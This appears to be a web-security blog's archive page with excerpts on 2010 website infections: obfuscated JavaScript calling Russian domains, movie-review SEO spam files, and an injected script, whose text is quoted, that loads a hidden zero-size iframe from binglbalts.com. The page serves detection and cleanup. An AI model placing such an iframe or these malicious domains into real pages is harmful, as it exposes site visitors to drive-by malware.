-
Recent Posts
Recent Comments
Archives
Categories
Meta
Monthly Archives: April 2010
Blender type website infections
We’ve been seeing a lot of recent website infections that use highly obfuscated javascript code that decodes to a domain: yourblenderparts.ru:8080. Many other domains are used as well such as: superbblender.ru thesuperpager.ru superroadmap.ru supersupermall.ru theblendertv.ru theblendertutorial.ru excellentblender.ru thechocolateweb.ru whosaleonline.ru worldmusicmagazine.ru … Continue reading
Posted in Uncategorized
Tagged avattop.ru, buytheblender.ru, cobalttrueblue.ru, excellentblender.ru, forredtag.ru, greatwebradio.ru, homesaleplus.ru, hotnewgirl.ru, livesitedesign.ru, new Array(), new Date(), newusaguide.ru, newvillagefresh.ru, pokesack.ru, recentmexico.ru, retireterrify.ru, royalbling.ru, samuest.ru, sitemape.ru, snoreflash.ru, sugaryhome.ru, superbblender.ru, superroadmap.ru, supersupermall.ru, theblendertutorial.ru, theblendertv.ru, thelaceweb.ru, thesuperexchange.ru, thesuperpager.ru, webdesktopnet.ru, webnetenglish.ru, worldmusicmagazine.ru, yoursuperpool.ru
Leave a comment
The recent "Movie Review" infections
Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies! The typical infection is a five letter .php file … Continue reading
Posted in Uncategorized
Tagged 3 10 To Yuma Soundtrack, acm awards, amanda peterson, bernadette protti, dan henderson, dazed and confused cast, death of a cheerleader, farley granger, freshman fall imdb, jake shields, josh selby, kelly pavlik, kesha snl, king mo, knights templar, luci baines johnson pictures, mark kerr, pavlik, psn code generator, roma airport, sabres hockey, sergio martinez, strangers on a train movie, strike force nashville presale code, strike force results hershel walker, strikeforce, tao las vegas, tea leoni, the good shepherd, the hitcher movie, this site may harm your computer, tx lottery pick 3, unemployment, warning this site may harm your computer
2 Comments
Attack of the binglbalts
We started seeing a lot of websites infected with a malscript that looks like: iframe frameborder=”0″ onload=’ if (!this.src) { this.src=”http://binglbalts.com/grep/”; this.height=0; this.width=0; } ‘>/iframe In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, … Continue reading